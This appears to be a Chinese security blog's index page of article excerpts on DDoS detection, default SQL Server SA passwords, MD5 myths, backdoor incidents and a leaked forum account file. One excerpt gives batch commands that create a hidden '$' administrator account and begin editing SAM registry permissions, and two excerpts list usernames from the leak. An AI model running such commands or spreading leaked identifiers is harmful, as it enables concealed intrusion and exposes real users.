DDoS攻击的检测

下面介绍如何判断服务器是否受到DDoS攻击。使用如下几个简单的步骤可以进行判断。
◆ 最明显的感觉是服务器响应缓慢,一般直接可以从服务器提供的页面显示速度上察觉。
◆ 登录服务器,用“netstat”命令查看,发现服务器有大量等待的TCP连接。
◆ 利用Sniffer、Tcpdump等嗅探工具会发现网络中充斥着大量源地址为假的伪装数据包。
◆ 从ISPtgi控上可以看出服务器的数据流量猛增,造成网络拥塞,服务器甚至不能正常地与外界通信。
...

标签:

国内多家软件公司产品存在安全隐患

作者:烟台 王岗(www.5iadmin.com,QQ:369459071),转载请保留此信息,谢谢。

笔者从事网络管理工作,数月前,应邀对本地一家公司做了一次安全检测,在检测就要结束的时候,在内网用嗅探到了一个SQLServer数据库的SA密码,经该公司的网络管理人员介绍说,该数据库服务器运行了一套软件,在互联网有固定的ip地址,用于与各地子公司交换数据用的,SA密码是软件安装人员设置的,数据库服务器从来没有出现过安全问题。尽管这个SA密码非常复杂,10多位字符,由数字和字母混合组成,但笔者一看到这个SA密码的部分字符,马上想到国内的一家软件公司,会不会这个家软件公司的SA密码设置都是相同的,或者大部分是这个?经过几个月的测试,笔者发现了更为惊人的情况,国内多个软件公司的部分数据库软件产品都存在安全隐患,严重威胁到运行服务器和数据的安全,入侵者可以在短时间内完全控制互联网上大量数据库服务器。SA密码泄露会造成什么危害请参考笔者的这篇文章:http://www.5iadmin.com/post/286.html。由于众所周知的原因,本文没有进行抓图说明,下文仅以字母代表软件公司的名称。
...

标签:

关于MD5摘要算法

MD5的全称是Message-Digest algorithm 5(信息-摘要算法),MD5是一种不可逆的算法,即对生成的密文求逆,对应着无穷个逆。它是在MD4基础上发展而来的,由于MD4可以在几分钟内找到一个冲突,所以很快就被淘汰了。现在,对MD5安全性的问题越来越被重视,甚至有的人就认为:MD5将很快走入历史。那么,事实情况是否如此,MD5真的不安全了吗?
  本文主要探讨几个容易对MD5产生误解的几个问题。
  误区一:碰撞随时可能发生
  如果对MD5摘要算法不了解,便误以为发现碰撞等同于破解,这种误解导致了很多人拼命地去寻找解密算法,最后只能无功而返。碰撞的发生是两个运动的过程,两个被改变的结果存在某种联系就是碰撞。MD5碰撞的发生主要是由于散列算法本身缺陷所导致的,并非MD5所独有,而MD5最大的好处应该是大大降低了这种碰撞被发现的几率和时间周期。只要拖延了足够的时间,MD5的价值也就得到了实现。问题是,随着计算机硬件技术的不断发展,这种靠时间延迟的摘要算法无法解决大大提高了的碰撞几率,也就使这种算法变得危险起来。
...

标签:

一次WinRoute后门攻防实况

我是通过Windows 2000和winroute的代理方式上网。这两天,代理服务器总是出现一些怪现象,运行程序好像很缓慢,而且还会自动重启。难道是中了病毒?还是中了木马?不管怎么样,先去看看再说吧。

来到机房,先把网线拔去。重启后,运行杀毒软件,杀了一遍,并没有发现病毒。随后插上网线,打开IE浏览器,这时奇怪的事情发生了,怎么地址栏里有一些莫名其妙的网址?难道有人用过这台电脑?我觉得事态严重了,可能中了木马。

我起身去倒了杯水,准备一场大战。当我回来的时候,浏览器居然自动打开了 “梦幻西游”的网站,正在下载客户端(还新装了一个下载软件),它居然想用我的代理服务器来挂机打网络游戏!

...

标签:

internetusers用户之谜

同事的一台笔记本电脑装的xp系统,三番几次被人增加系统用户,用户名都internetusers,问问同事的笔记本电脑最近都做什么了,答复是一家软件公司给安装了一套数据库软件,这下基本明白怎么回事了,按了2次重启键,用以前的用户登录到系统,看到了sqlserver的运行图标,打开查询分析其,用sa登录,密码为空,登录成功,没检查是否有木马什么的。

标签:

某个知名技术论坛用户名和密码泄露(第二部分)

这几天在搜索资料时,通过快照发现一个保存大量用户名和md5密码的文件,应该是某个技术论坛的用户和密码,下面是部分用户名,如果有你常用的id,而且你有一码行天下的习惯,那就需要注意了,有可能被人社工到你的其他密码。

Adrianlu
adriano
adriit
adrion
ads__23
ads7408
adsir_cao
ADSL
adsl123321
adsl123zxh
...

标签:

某个知名技术论坛用户名和密码泄露(第一部分)

这几天在搜索资料时,通过快照发现一个保存大量用户名和md5密码的文件,应该是某个技术论坛的用户和密码,下面是部分用户名,如果有你常用的id,而且你有一码行天下的习惯,那就需要注意了,有可能被人社工到你的其他密码。

8149801
8156
8160603
8162ajian
8163959
8170138
8171459
8182838485
8195159
8195426
...

标签:

添加隐藏用户脚本

net user admins$ 1234567 /add
net localgroup administrators admins$ /add
Echo HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.ini
...

标签:

计算机检查漏洞方法和相应处理

近来黑客攻击事件频频发生,我们身边的朋友可能有qq、E-mail和游戏账号被盗事件发生。现在的黑客技术有朝着大众化方向发展的趋势,能够掌握攻击他人系统技术的人越来越多了,只要你的电脑稍微有点系统Bug或者安装了有问题的应用程序,就有可能成为他人的肉鸡。如何给一台上网的机器查漏洞并做出相应的处理呢?

  一、要命的端口

  计算机要与外界进行通信,必须通过一些端口。别人要想入侵和控制我们的电脑,也要从某些端口连接进来。如果开放了139、445、3389、4899等重要端口,要知道这些端口都可以为黑客入侵提供便利。尤其是4899,可能是入侵者安装的后门工具Radmin打开的,他可以通过这个端口取得系统的完全控制权。

...

标签:

Microsoft SQL Server SA权限最新入侵方法

Microsoft SQL Server SA权限服务器一直是黑客青睐的对象,笔者在51CTO网站也曾经发表过三篇相关的攻防文章(SA弱口令带来的安全隐患Microsoft SQL Server SA弱口令攻防实战SQL Server SA空口令的渗透测试日记),本文再向大家介绍几种入侵方法,读者可以根据情况找出防范办法。

标签: